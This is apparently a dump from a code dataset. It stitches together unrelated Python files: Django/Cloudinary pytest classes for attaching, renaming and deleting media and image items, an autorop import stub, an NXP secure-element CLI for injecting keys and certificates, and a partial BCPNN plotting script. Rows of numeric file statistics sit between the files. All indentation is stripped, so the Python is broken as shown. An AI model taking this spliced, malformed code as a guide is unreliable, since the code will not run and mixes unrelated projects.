class TestMediaItemAttach(TestFileFieldResourceAttach):
resource_class = CloudinaryMediaItem
resource_size = 2113939
resource_checksum = '4792f5f997f82f225299e98a1e396c7d7e479d10ffe6976f0b487361d729a15d'
collection_class = CloudinaryMediaCollection
@contextmanager
def get_resource(self):
collection = self.collection_class.objects.create()
resource = self.resource_class()
resource.attach_to(collection)
try:
yield resource
finally:
resource.delete_file()
collection.delete()
def test_file(self):
with self.get_resource() as resource:
with open(AUDIO_FILEPATH, 'rb') as fp:
resource.attach_file(fp)
assert resource.basename == 'audio'
assert resource.extension == 'mp3'
assert resource.size == self.resource_size
assert resource.checksum == self.resource_checksum
def test_django_file(self):
with self.get_resource() as resource:
with open(AUDIO_FILEPATH, 'rb') as fp:
file = File(fp, name='milky-way-nasa.jpg')
resource.attach_file(file)
assert resource.basename == 'milky-way-nasa'
assert resource.extension == 'mp3'
assert resource.size == self.resource_size
assert resource.checksum == self.resource_checksum
def test_override_name(self):
with self.get_resource() as resource:
with open(AUDIO_FILEPATH, 'rb') as fp:
resource.attach_file(fp, name='overwritten.jpg')
assert resource.basename == 'overwritten'
assert resource.extension == 'mp3'
def test_override_django_name(self):
with self.get_resource() as resource:
with open(AUDIO_FILEPATH, 'rb') as fp:
file = File(fp, name='not_used.png')
resource.attach_file(file, name='overwritten.jpg')
assert resource.basename == 'overwritten'
assert resource.extension == 'mp3'
def test_wrong_extension(self):
with self.get_resource() as resource:
with open(AUDIO_FILEPATH, 'rb') as fp:
resource.attach_file(fp, name='overwritten.gif')
assert resource.basename == 'overwritten'
assert resource.extension == 'mp3'
def test_file_position_at_end(self):
with self.get_resource() as resource:
with open(AUDIO_FILEPATH, 'rb') as fp:
resource.attach_file(fp)
assert fp.tell() == self.resource_size
def test_unsupported_file(self):
with self.get_resource() as resource:
with open(NASA_FILEPATH, 'rb') as fp:
with pytest.raises(UnsupportedFileError):
resource.attach_file(fp)
class TestMediaItemRename(TestFileFieldResourceRename):
resource_class = CloudinaryMediaItem
resource_location = 'collections/files/%Y-%m-%d'
collection_class = CloudinaryMediaCollection
@classmethod
def init_class(cls, storage):
storage.collection = cls.collection_class.objects.create()
storage.uid = get_random_string(5)
storage.resource = cls.resource_class()
storage.resource.attach_to(storage.collection)
with open(AUDIO_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp, name='old_cmedia_name_{}.mp3'.format(storage.uid))
storage.resource.save()
file = storage.resource.get_file()
storage.old_source_name = file.name
storage.resource.rename_file('new_cmedia_name_{}.ogg'.format(storage.uid))
yield
storage.resource.delete_file()
storage.resource.delete()
def test_old_file_exists(self, storage):
file = storage.resource.get_file()
with pytest.raises(cloudinary.exceptions.Error):
uploader.explicit(
storage.old_source_name,
type=file.resource.type,
resource_type=file.resource.resource_type
)
def test_new_file_exists(self, storage):
file = storage.resource.get_file()
uploader.explicit(
file.name,
type=file.resource.type,
resource_type=file.resource.resource_type
)
def test_old_file_name(self, storage):
assert storage.old_source_name == utils.get_target_filepath(
posixpath.join(self.resource_location, 'old_cmedia_name_{}{{suffix}}'.format(storage.uid)),
storage.old_source_name
)
def test_new_file_name(self, storage):
file = storage.resource.get_file()
assert file.name == utils.get_target_filepath(
posixpath.join(self.resource_location, 'new_cmedia_name_{}{{suffix}}'.format(storage.uid)),
file.name
)
def test_basename(self, storage):
assert storage.resource.basename == utils.get_target_filepath(
'new_cmedia_name_{}{{suffix}}'.format(storage.uid),
storage.resource.basename
)
def test_extension(self, storage):
assert storage.resource.extension == 'mp3'
class TestMediaItemDelete(TestFileFieldResourceDelete):
resource_class = CloudinaryMediaItem
resource_location = 'collections/files/%Y-%m-%d'
collection_class = CloudinaryMediaCollection
@classmethod
def init_class(cls, storage):
storage.collection = cls.collection_class.objects.create()
storage.resource = cls.resource_class()
storage.resource.attach_to(storage.collection)
with open(AUDIO_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp, name='old_name.jpg')
storage.resource.save()
file = storage.resource.get_file()
storage.old_source_name = file.name
storage.resource.delete_file()
yield
storage.resource.delete()
def test_file_name(self, storage):
assert storage.old_source_name == utils.get_target_filepath(
posixpath.join(self.resource_location, 'old_name{suffix}'),
storage.old_source_name
)
def test_file_not_exists(self, storage):
file_field = storage.resource.get_file_field()
with pytest.raises(cloudinary.exceptions.Error):
uploader.explicit(
storage.old_source_name,
type=file_field.type,
resource_type=file_field.resource_type
)
class TestMediaItemEmpty(TestFileFieldResourceEmpty):
recource_class = CloudinaryMediaItem
collection_class = CloudinaryMediaCollection
@classmethod
def init_class(cls, storage):
collection = cls.collection_class.objects.create()
storage.resource = cls.recource_class()
storage.resource.attach_to(collection)
yield
collection.delete()
def test_path(self, storage):
pass
class TestImageItem(CollectionItemMixin, CloudinaryFileResource):
resource_url = 'collections/images/%Y-%m-%d'
resource_location = 'collections/images/%Y-%m-%d'
resource_name = 'Nature Tree'
resource_extension = 'jpg'
resource_size = 672759
resource_checksum = 'e3a7f0318daaa395af0b84c1bca249cbfd46b9994b0aceb07f74332de4b061e1'
owner_app_label = ''
owner_model_name = ''
owner_fieldname = ''
owner_class = None
file_field_name = 'file'
collection_class = CloudinaryCompleteCollection
@classmethod
def init_class(cls, storage):
storage.collection = cls.collection_class.objects.create()
storage.resource = CloudinaryImageItem()
storage.resource.attach_to(storage.collection)
with open(NATURE_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp)
storage.resource.save()
yield
storage.resource.delete_file()
storage.resource.delete()
storage.collection.delete()
def test_get_file_folder(self, storage):
assert storage.resource.get_file_folder() == self.resource_location
def test_item_type(self, storage):
assert storage.resource.item_type == 'image'
def test_type(self, storage):
file_field = storage.resource.get_file_field()
assert file_field.type == 'private'
assert file_field.resource_type == 'image'
def test_public_id(self, storage):
public_id = storage.resource.get_file().public_id
pattern = posixpath.join(self.resource_location, 'Nature_Tree{suffix}')
assert public_id == utils.get_target_filepath(pattern, public_id)
def test_name(self, storage):
file_name = storage.resource.name
pattern = posixpath.join(self.resource_location, 'Nature_Tree{suffix}')
assert file_name == utils.get_target_filepath(pattern, file_name)
def test_as_dict(self, storage):
assert storage.resource.as_dict() == {
'id': 1,
'collectionId': 1,
'itemType': 'image',
'name': self.resource_name,
'extension': self.resource_extension,
'size': self.resource_size,
'width': 1534,
'height': 2301,
'cropregion': '',
'title': '',
'description': '',
'caption': '{}.{}'.format(self.resource_name, self.resource_extension),
'order': 0,
'preview': render_to_string(
'paper_uploads_cloudinary/items/preview/image.html',
storage.resource.get_preview_context()
),
'url': storage.resource.get_file_url(),
'created': storage.resource.created_at.isoformat(),
'modified': storage.resource.modified_at.isoformat(),
'uploaded': storage.resource.uploaded_at.isoformat(),
}
def test_width(self, storage):
assert storage.resource.width == 1534
def test_height(self, storage):
assert storage.resource.height == 2301
def test_file_supported(self, storage):
with open(DOCUMENT_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is False
with open(NATURE_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is True
with open(MEDITATION_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is True
with open(AUDIO_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is False
@pytest.mark.django_db
class TestImageItemAttach(TestImageFieldResourceAttach):
resource_class = CloudinaryImageItem
collection_class = CloudinaryCompleteCollection
@contextmanager
def get_resource(self):
collection = self.collection_class.objects.create()
resource = self.resource_class()
resource.attach_to(collection)
try:
yield resource
finally:
resource.delete_file()
collection.delete()
def test_unsupported_file(self):
with self.get_resource() as resource:
with open(DOCUMENT_FILEPATH, 'rb') as fp:
with pytest.raises(UnsupportedFileError):
resource.attach_file(fp)
class TestImageItemRename(TestImageFieldResourceRename):
resource_class = CloudinaryImageItem
resource_location = 'collections/images/%Y-%m-%d'
collection_class = CloudinaryCompleteCollection
@classmethod
def init_class(cls, storage):
storage.collection = cls.collection_class.objects.create()
storage.uid = get_random_string(5)
storage.resource = cls.resource_class()
storage.resource.attach_to(storage.collection)
with open(CALLIPHORA_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp, name='old_cimage_name_{}.jpg'.format(storage.uid))
storage.resource.save()
file = storage.resource.get_file()
storage.old_source_name = file.name
storage.resource.rename_file('new_cimage_name_{}.png'.format(storage.uid))
yield
storage.resource.delete_file()
storage.resource.delete()
def test_old_file_exists(self, storage):
file = storage.resource.get_file()
with pytest.raises(cloudinary.exceptions.Error):
uploader.explicit(
storage.old_source_name,
type=file.resource.type,
resource_type=file.resource.resource_type
)
def test_new_file_exists(self, storage):
file = storage.resource.get_file()
uploader.explicit(
file.name,
type=file.resource.type,
resource_type=file.resource.resource_type
)
def test_old_file_name(self, storage):
assert storage.old_source_name == utils.get_target_filepath(
posixpath.join(self.resource_location, 'old_cimage_name_{}{{suffix}}'.format(storage.uid)),
storage.old_source_name
)
def test_new_file_name(self, storage):
file = storage.resource.get_file()
assert file.name == utils.get_target_filepath(
posixpath.join(self.resource_location, 'new_cimage_name_{}{{suffix}}'.format(storage.uid)),
file.name
)
def test_basename(self, storage):
assert storage.resource.basename == utils.get_target_filepath(
'new_cimage_name_{}{{suffix}}'.format(storage.uid),
storage.resource.basename
)
def test_extension(self, storage):
assert storage.resource.extension == 'jpg'
class TestImageItemDelete(TestImageFieldResourceDelete):
resource_class = CloudinaryImageItem
resource_location = 'collections/images/%Y-%m-%d'
collection_class = CloudinaryCompleteCollection
@classmethod
def init_class(cls, storage):
storage.collection = cls.collection_class.objects.create()
storage.resource = cls.resource_class()
storage.resource.attach_to(storage.collection)
with open(CALLIPHORA_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp, name='old_name.jpg')
storage.resource.save()
file = storage.resource.get_file()
storage.old_source_name = file.name
storage.resource.delete_file()
yield
storage.resource.delete()
def test_file_name(self, storage):
assert storage.old_source_name == utils.get_target_filepath(
posixpath.join(self.resource_location, 'old_name{suffix}'),
storage.old_source_name
)
def test_file_not_exists(self, storage):
file_field = storage.resource.get_file_field()
with pytest.raises(cloudinary.exceptions.Error):
uploader.explicit(
storage.old_source_name,
type=file_field.type,
resource_type=file_field.resource_type
)
class TestImageItemEmpty(TestImageFieldResourceEmpty):
recource_class = CloudinaryImageItem
collection_class = CloudinaryCompleteCollection
@classmethod
def init_class(cls, storage):
collection = cls.collection_class.objects.create()
storage.resource = cls.recource_class()
storage.resource.attach_to(collection)
yield
collection.delete()
def test_path(self, storage):
pass
| 35.421935 | 106 | 0.661992 | 2,932 | 27,452 | 5.975102 | 0.068213 | 0.11987 | 0.033906 | 0.037673 | 0.861236 | 0.845825 | 0.832924 | 0.827901 | 0.822364 | 0.81483 | 0 | 0.010981 | 0.240347 | 27,452 | 774 | 107 | 35.4677 | 0.829098 | 0 | 0 | 0.7728 | 0 | 0 | 0.069066 | 0.039924 | 0 | 0 | 0 | 0 | 0.1072 | 1 | 0.12 | false | 0.0048 | 0.0256 | 0 | 0.272 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5cbce3da4a4e6de778bdd882e66cb879f62de623 | 74 | py | Python | autorop/leak/__init__.py | Tanson/autorop | 0d2fc71cdcc9649a6006aee641a3808f884d7fc4 | [
"MIT"
] | null | null | null | autorop/leak/__init__.py | Tanson/autorop | 0d2fc71cdcc9649a6006aee641a3808f884d7fc4 | [
"MIT"
] | null | null | null | autorop/leak/__init__.py | Tanson/autorop | 0d2fc71cdcc9649a6006aee641a3808f884d7fc4 | [
"MIT"
] | null | null | null | from autorop.leak.puts import puts
from autorop.leak.printf import printf
| 24.666667 | 38 | 0.837838 | 12 | 74 | 5.166667 | 0.5 | 0.354839 | 0.483871 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 74 | 2 | 39 | 37 | 0.939394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 8 |
5cccba75b828b0157c550ed1c0070ccb5060bd71 | 15,184 | py | Python | src/cli/cli_set.py | foundriesio/plug-and-trust-ssscli | f77c65d5b3de649d7db1c023ee41d871f77cd224 | [
"Apache-2.0"
] | null | null | null | src/cli/cli_set.py | foundriesio/plug-and-trust-ssscli | f77c65d5b3de649d7db1c023ee41d871f77cd224 | [
"Apache-2.0"
] | null | null | null | src/cli/cli_set.py | foundriesio/plug-and-trust-ssscli | f77c65d5b3de649d7db1c023ee41d871f77cd224 | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2018-2020 NXP
# SPDX-License-Identifier: Apache-2.0
#
#
"""License text"""
import sys
import click
import func_timeout
from sss.setkey import Set
from sss.policy import Policy
import sss.sss_api as apis
from .cli import set, pass_context, session_open, session_close, log_traceback, TIME_OUT # pylint: disable=redefined-builtin
@set.group()
@pass_context
def ecc(cli_ctx):
"""Set ECC Keys"""
cli_ctx.vlog("Set ECC Keys")
@set.group()
@pass_context
def rsa(cli_ctx):
"""Set RSA Keys"""
cli_ctx.vlog("Set RSA Keys")
@set.command('hmac', short_help='Set HMAC Keys')
@click.argument('keyid', type=str, metavar='keyid')
@click.argument('key', type=str, metavar='key')
@pass_context
def hmac(cli_ctx, keyid, key):
""" Set HMAC Keys \n
keyid = 32bit Key ID. Should be in hex format. Example: 20E8A001 \n
key = Can be in file or raw key in DER or HEX format\n
"""
try:
keyid = int(keyid, 16)
cli_ctx.log("Injecting HMAC Key at KeyID = 0x%08X" % keyid)
session_open(cli_ctx)
set_object = Set(cli_ctx.session)
status = func_timeout.func_timeout(TIME_OUT, set_object.do_set_hmac_key, (keyid, key, None))
except func_timeout.FunctionTimedOut as timeout_exc:
log_traceback(cli_ctx, timeout_exc.getMsg())
status = apis.kStatus_SSS_Fail
except Exception as exc: # pylint: disable=broad-except
log_traceback(cli_ctx, exc)
status = apis.kStatus_SSS_Fail
session_status = session_close(cli_ctx)
if status == apis.kStatus_SSS_Success and session_status == apis.kStatus_SSS_Success:
cli_ctx.log("Injected HMAC Key at KeyID = 0x%08X" % keyid)
ret_value = 0
else:
cli_ctx.log("ERROR! Could not Inject HMAC Key at KeyID 0x%08X " % (keyid,))
ret_value = 1
sys.exit(ret_value)
@set.command('aes', short_help='Set AES Keys')
@click.argument('keyid', type=str, metavar='keyid')
@click.argument('key', type=str, metavar='key')
@click.option('--policy_name', type=str, default='', help="File name of the policy to be applied")
@pass_context
def aes(cli_ctx, keyid, key, policy_name):
""" Set AES Keys \n
keyid = 32bit Key ID. Should be in hex format. Example: 20E8A001 \n
key = Can be in file or raw key in DER or HEX format\n
"""
try:
keyid = int(keyid, 16)
if policy_name != '':
policy_obj = Policy()
policy_params = policy_obj.get_object_policy(policy_name)
policy = policy_obj.convert_obj_policy_to_ctype(policy_params)
else:
policy = None
cli_ctx.log("Injecting AES Key at KeyID = 0x%08X" % keyid)
session_open(cli_ctx)
set_object = Set(cli_ctx.session)
status = func_timeout.func_timeout(TIME_OUT, set_object.do_set_sym_key,
(keyid, key, policy))
except func_timeout.FunctionTimedOut as timeout_exc:
log_traceback(cli_ctx, timeout_exc.getMsg())
status = apis.kStatus_SSS_Fail
except Exception as exc: # pylint: disable=broad-except
log_traceback(cli_ctx, exc)
status = apis.kStatus_SSS_Fail
session_status = session_close(cli_ctx)
if status == apis.kStatus_SSS_Success and session_status == apis.kStatus_SSS_Success:
cli_ctx.log("Injected AES Key at KeyID = 0x%08X" % keyid)
ret_value = 0
else:
cli_ctx.log("ERROR! Could not Inject AES Key at KeyID 0x%08X " % (keyid,))
ret_value = 1
sys.exit(ret_value)
@set.command('cert', short_help='Set Certificate')
@click.argument('keyid', type=str, metavar='keyid')
@click.argument('key', type=str, metavar='key')
@click.option('--format', default='',
help="Input certificate format. TEXT can be \"DER\" or \"PEM\"")
@click.option('--policy_name', type=str, default='', help="File name of the policy to be applied")
@pass_context
def cert(cli_ctx, keyid, key, format, policy_name):
""" Set Certificate \n
keyid = 32bit Key ID. Should be in hex format. Example: 20E8A001 \n
key = Can be raw certificate (DER format) or in file.
For file, by default filename with extension .pem and .cer considered
as PEM format and others as DER format.\n
"""
try:
keyid = int(keyid, 16)
if policy_name != '':
policy_obj = Policy()
policy_params = policy_obj.get_object_policy(policy_name)
policy = policy_obj.convert_obj_policy_to_ctype(policy_params)
else:
policy = None
cli_ctx.log("Injecting Certificate at KeyID = 0x%08X" % keyid)
session_open(cli_ctx)
set_object = Set(cli_ctx.session)
status = func_timeout.func_timeout(TIME_OUT, set_object.do_set_cert,
(keyid, key, policy, format))
except func_timeout.FunctionTimedOut as timeout_exc:
log_traceback(cli_ctx, timeout_exc.getMsg())
status = apis.kStatus_SSS_Fail
except Exception as exc: # pylint: disable=broad-except
log_traceback(cli_ctx, exc)
status = apis.kStatus_SSS_Fail
session_status = session_close(cli_ctx)
if status == apis.kStatus_SSS_Success and session_status == apis.kStatus_SSS_Success:
cli_ctx.log("Injected Certificate at KeyID = 0x%08X" % keyid)
ret_value = 0
else:
cli_ctx.log("ERROR! Could not Inject Certificate at KeyID 0x%08X "
% (keyid,))
ret_value = 1
sys.exit(ret_value)
@set.command('bin', short_help='Set Binary')
@click.argument('keyid', type=str, metavar='keyid')
@click.argument('data', type=str, metavar='data')
@click.option('--policy_name', type=str, default='', help="File name of the policy to be applied")
@pass_context
def bin(cli_ctx, keyid, data, policy_name):
""" Set Certificate \n
keyid = 32bit Key ID. Should be in hex format. Example: 20E8A001 \n
data = Can be raw binary or in file \n
"""
try:
keyid = int(keyid, 16)
if policy_name != '':
policy_obj = Policy()
policy_params = policy_obj.get_object_policy(policy_name)
policy = policy_obj.convert_obj_policy_to_ctype(policy_params)
else:
policy = None
cli_ctx.log("Injecting Binary at KeyID = 0x%08X" % keyid)
session_open(cli_ctx)
set_object = Set(cli_ctx.session)
status = func_timeout.func_timeout(TIME_OUT, set_object.do_set_bin,
(keyid, data, policy))
except func_timeout.FunctionTimedOut as timeout_exc:
log_traceback(cli_ctx, timeout_exc.getMsg())
status = apis.kStatus_SSS_Fail
except Exception as exc: # pylint: disable=broad-except
log_traceback(cli_ctx, exc)
status = apis.kStatus_SSS_Fail
session_status = session_close(cli_ctx)
if status == apis.kStatus_SSS_Success and session_status == apis.kStatus_SSS_Success:
cli_ctx.log("Injected Binary at KeyID = 0x%08X" % keyid)
ret_value = 0
else:
cli_ctx.log("ERROR! Could not Inject Binary at KeyID 0x%08X "
% (keyid,))
ret_value = 1
sys.exit(ret_value)
@ecc.command('pub', short_help='Set ECC Public Keys')
@click.argument('keyid', type=str, metavar='keyid')
@click.argument('key', type=str, metavar='key')
@click.option('--format', default='',
help="Input key format. TEXT can be \"DER\" or \"PEM\"")
@click.option('--policy_name', type=str, default='', help="File name of the policy to be applied")
@pass_context
def pub(cli_ctx, keyid, key, format, policy_name):
""" Set ECC Public Keys \n
keyid = 32bit Key ID. Should be in hex format. Example: 20E8A001 \n
key = Can be raw key (DER format) or in file.
For file, by default filename with extension .pem considered as PEM format
and others as DER format.\n
"""
try:
keyid = int(keyid, 16)
if policy_name != '':
policy_obj = Policy()
policy_params = policy_obj.get_object_policy(policy_name)
policy = policy_obj.convert_obj_policy_to_ctype(policy_params)
else:
policy = None
cli_ctx.log("Injecting ECC Public Key at KeyID = 0x%08X" % (keyid,))
session_open(cli_ctx)
set_object = Set(cli_ctx.session)
status = func_timeout.func_timeout(TIME_OUT, set_object.do_set_ecc_pub_key,
(keyid, key, policy, format))
except func_timeout.FunctionTimedOut as timeout_exc:
log_traceback(cli_ctx, timeout_exc.getMsg())
status = apis.kStatus_SSS_Fail
except Exception as exc: # pylint: disable=broad-except
log_traceback(cli_ctx, exc)
status = apis.kStatus_SSS_Fail
session_status = session_close(cli_ctx)
if status == apis.kStatus_SSS_Success and session_status == apis.kStatus_SSS_Success:
cli_ctx.log("Injected ECC Public Key at KeyID = 0x%08X" % keyid)
ret_value = 0
else:
cli_ctx.log("ERROR! Could not Inject ECC Public Key at KeyID 0x%08X "
% (keyid,))
ret_value = 1
sys.exit(ret_value)
@ecc.command('pair', short_help='Set ECC Key pair')
@click.argument('keyid', type=str, metavar='keyid')
@click.argument('key', type=str, metavar='key')
@click.option('--format', default='',
help="Input key format. TEXT can be \"DER\" or \"PEM\"")
@click.option('--policy_name', type=str, default='', help="File name of the policy to be applied")
@pass_context
def pair(cli_ctx, keyid, key, format, policy_name):
""" Set ECC Key pair \n
keyid = 32bit Key ID. Should be in hex format. Example: 20E8A001 \n
key = Can be raw key (DER format) or in file.
For file, by default filename with extension .pem considered as PEM format
and others as DER format.\n
"""
try:
keyid = int(keyid, 16)
if policy_name != '':
policy_obj = Policy()
policy_params = policy_obj.get_object_policy(policy_name)
policy = policy_obj.convert_obj_policy_to_ctype(policy_params)
else:
policy = None
cli_ctx.log("Injecting ECC Key Pair at KeyID = 0x%08X" % (keyid,))
session_open(cli_ctx)
set_object = Set(cli_ctx.session)
status = func_timeout.func_timeout(TIME_OUT, set_object.do_set_ecc_key_pair,
(keyid, key, policy, format))
except func_timeout.FunctionTimedOut as timeout_exc:
log_traceback(cli_ctx, timeout_exc.getMsg())
status = apis.kStatus_SSS_Fail
except Exception as exc: # pylint: disable=broad-except
log_traceback(cli_ctx, exc)
status = apis.kStatus_SSS_Fail
session_status = session_close(cli_ctx)
if status == apis.kStatus_SSS_Success and session_status == apis.kStatus_SSS_Success:
cli_ctx.log("Injected ECC Key Pair at KeyID = 0x%08X" % keyid)
ret_value = 0
else:
cli_ctx.log("ERROR! Could not Inject ECC Pair at KeyID 0x%08X "
% (keyid,))
ret_value = 1
sys.exit(ret_value)
@rsa.command('pub', short_help='Set RSA Public Keys')
@click.argument('keyid', type=str, metavar='keyid')
@click.argument('key', type=str, metavar='key')
@click.option('--format', default='',
help="Input key format. TEXT can be \"DER\" or \"PEM\"")
@click.option('--policy_name', type=str, default='', help="File name of the policy to be applied")
@pass_context
def pub(cli_ctx, keyid, key, format, policy_name):
""" Set RSA Public Keys \n
keyid = 32bit Key ID. Should be in hex format. Example: 20E8A001 \n
key = Can be raw key (DER format) or in file.
For file, by default filename with extension .pem considered as PEM format
and others as DER format.\n
"""
try:
keyid = int(keyid, 16)
if policy_name != '':
policy_obj = Policy()
policy_params = policy_obj.get_object_policy(policy_name)
policy = policy_obj.convert_obj_policy_to_ctype(policy_params)
else:
policy = None
cli_ctx.log("Injecting RSA Public Key at KeyID = 0x%08X" % keyid)
session_open(cli_ctx)
set_object = Set(cli_ctx.session)
status = func_timeout.func_timeout(TIME_OUT, set_object.do_set_rsa_pub_key,
(keyid, key, policy, format))
except func_timeout.FunctionTimedOut as timeout_exc:
log_traceback(cli_ctx, timeout_exc.getMsg())
status = apis.kStatus_SSS_Fail
except Exception as exc: # pylint: disable=broad-except
log_traceback(cli_ctx, exc)
status = apis.kStatus_SSS_Fail
session_status = session_close(cli_ctx)
if status == apis.kStatus_SSS_Success and session_status == apis.kStatus_SSS_Success:
cli_ctx.log("Injected RSA Public Key at KeyID = 0x%08X" % keyid)
ret_value = 0
else:
cli_ctx.log("ERROR! Could not Inject RSA Public Key at KeyID 0x%08X "
% (keyid,))
ret_value = 1
sys.exit(ret_value)
@rsa.command('pair', short_help='Set RSA Key Pair')
@click.argument('keyid', type=str, metavar='keyid')
@click.argument('key', type=str, metavar='key')
@click.option('--format', default='',
help="Input key format. TEXT can be \"DER\" or \"PEM\"")
@click.option('--policy_name', type=str, default='', help="File name of the policy to be applied")
@pass_context
def pair(cli_ctx, keyid, key, format, policy_name):
""" Set RSA Key Pair \n
keyid = 32bit Key ID. Should be in hex format. Example: 20E8A001 \n
key = Can be raw key (DER format) or in file.
For file, by default filename with extension .pem considered as PEM format
and others as DER format.\n
"""
try:
keyid = int(keyid, 16)
if policy_name != '':
policy_obj = Policy()
policy_params = policy_obj.get_object_policy(policy_name)
policy = policy_obj.convert_obj_policy_to_ctype(policy_params)
else:
policy = None
cli_ctx.log("Injecting RSA Key Pair at KeyID = 0x%08X" % keyid)
session_open(cli_ctx)
set_object = Set(cli_ctx.session)
status = func_timeout.func_timeout(TIME_OUT, set_object.do_set_rsa_key_pair,
(keyid, key, policy, format))
except func_timeout.FunctionTimedOut as timeout_exc:
log_traceback(cli_ctx, timeout_exc.getMsg())
status = apis.kStatus_SSS_Fail
except Exception as exc: # pylint: disable=broad-except
log_traceback(cli_ctx, exc)
status = apis.kStatus_SSS_Fail
session_status = session_close(cli_ctx)
if status == apis.kStatus_SSS_Success and session_status == apis.kStatus_SSS_Success:
cli_ctx.log("Injected RSA Key Pair at KeyID = 0x%08X" % keyid)
ret_value = 0
else:
cli_ctx.log("ERROR! Could not Inject RSA Pair at KeyID 0x%08X "
% (keyid,))
ret_value = 1
sys.exit(ret_value)
| 40.382979 | 125 | 0.643111 | 2,118 | 15,184 | 4.406516 | 0.063267 | 0.048859 | 0.058288 | 0.068574 | 0.93014 | 0.91514 | 0.913318 | 0.912568 | 0.906782 | 0.898639 | 0 | 0.015647 | 0.25079 | 15,184 | 375 | 126 | 40.490667 | 0.804764 | 0.129149 | 0 | 0.794425 | 0 | 0 | 0.147054 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034843 | false | 0.038328 | 0.02439 | 0 | 0.059233 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7a3b7079c0e32ee65d8c1690adc30d5a27582510 | 6,396 | py | Python | plots/bernstein_connectivity_matrices.py | h-mayorquin/attractor_sequences | 885271f30d73a58a7aad83b55949e4e32ba0b45a | [
"MIT"
] | 1 | 2016-08-19T18:58:51.000Z | 2016-08-19T18:58:51.000Z | plots/bernstein_connectivity_matrices.py | h-mayorquin/attractor_sequences | 885271f30d73a58a7aad83b55949e4e32ba0b45a | [
"MIT"
] | null | null | null | plots/bernstein_connectivity_matrices.py | h-mayorquin/attractor_sequences | 885271f30d73a58a7aad83b55949e4e32ba0b45a | [
"MIT"
] | null | null | null | import sys
sys.path.append('../')
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
import seaborn as sns
from network import Protocol, BCPNNFast, NetworkManager
from analysis_functions import calculate_recall_success_sequences
from connectivity_functions import create_artificial_manager
from plotting_functions import set_text
sns.set(font_scale=3.0)
normal_plot = True
overlaped_plot = True
overloaded_pot = True
sigma = 0
if normal_plot:
# Patterns parameters
hypercolumns = 4
minicolumns = 10
n_patterns = 10
dt = 0.001
# Manager properties
dt = 0.001
T_recalling = 5.0
values_to_save = ['o']
# Protocol
training_time = 0.1
inter_sequence_interval = 3.0
inter_pulse_interval = 0.0
epochs = 3
tau_p = 100.0
# Build the network
nn = BCPNNFast(hypercolumns, minicolumns, sigma=0, tau_p=tau_p)
# Build the manager
manager = NetworkManager(nn=nn, dt=dt, values_to_save=values_to_save)
# Build the protocol
# Build the protocol for training
protocol = Protocol()
patterns_indexes = [i for i in range(n_patterns)]
protocol.simple_protocol(patterns_indexes, training_time=training_time, inter_pulse_interval=inter_pulse_interval,
inter_sequence_interval=inter_sequence_interval, epochs=epochs)
# Train
epoch_history = manager.run_network_protocol(protocol=protocol, verbose=True)
# Now plotting
w = nn.w
fig = plt.figure(figsize=(16, 12))
ax = fig.add_subplot(111)
w = w[:nn.minicolumns, :nn.minicolumns]
aux_max = np.max(np.abs(w))
cmap = 'coolwarm'
im = ax.imshow(w, cmap=cmap, interpolation='None', vmin=-aux_max, vmax=aux_max)
divider = make_axes_locatable(ax)
cax = divider.append_axes('right', size='5%', pad=0.05)
ax.get_figure().colorbar(im, ax=ax, cax=cax)
# Add text numbers
for i in range(n_patterns - 1):
coordinate_from = i
coordinate_to = i + 1
set_text(ax, coordinate_from, coordinate_to, fontsize=25)
# Editing
ax.grid()
ax.set_title('Simple sequence')
ax.set_xlabel('Input')
ax.set_ylabel('Output')
fname = './plots/matrix_normal.pdf'
plt.savefig(fname, format='pdf', dpi=100, bbox_inches='tight', frameon=True, transparent=False)
plt.show()
if overlaped_plot:
# Patterns parameters
hypercolumns = 4
minicolumns = 15
n_patterns = 10
dt = 0.001
# Manager properties
dt = 0.001
T_recalling = 5.0
values_to_save = ['o']
# Protocol
training_time = 0.3
inter_sequence_interval = 1.0
inter_pulse_interval = 0.0
epochs = 3
tau_p = 100.0
# Build the network
nn = BCPNNFast(hypercolumns, minicolumns, sigma=0, tau_p=tau_p)
# Build the manager
manager = NetworkManager(nn=nn, dt=dt, values_to_save=values_to_save)
# Build chain protocol
chain_protocol = Protocol()
sequences = [[0, 1, 2, 3, 4, 5, 6], [7, 8, 2, 3, 4, 9, 10]]
chain_protocol.cross_protocol(sequences, training_time=training_time,
inter_sequence_interval=inter_sequence_interval, epochs=epochs)
print(sequences)
# Train
manager.run_network_protocol(protocol=chain_protocol, verbose=True)
# Now plotting
w = nn.w
fig = plt.figure(figsize=(16, 12))
ax = fig.add_subplot(111)
w = w[:nn.minicolumns, :nn.minicolumns]
aux_max = np.max(np.abs(w))
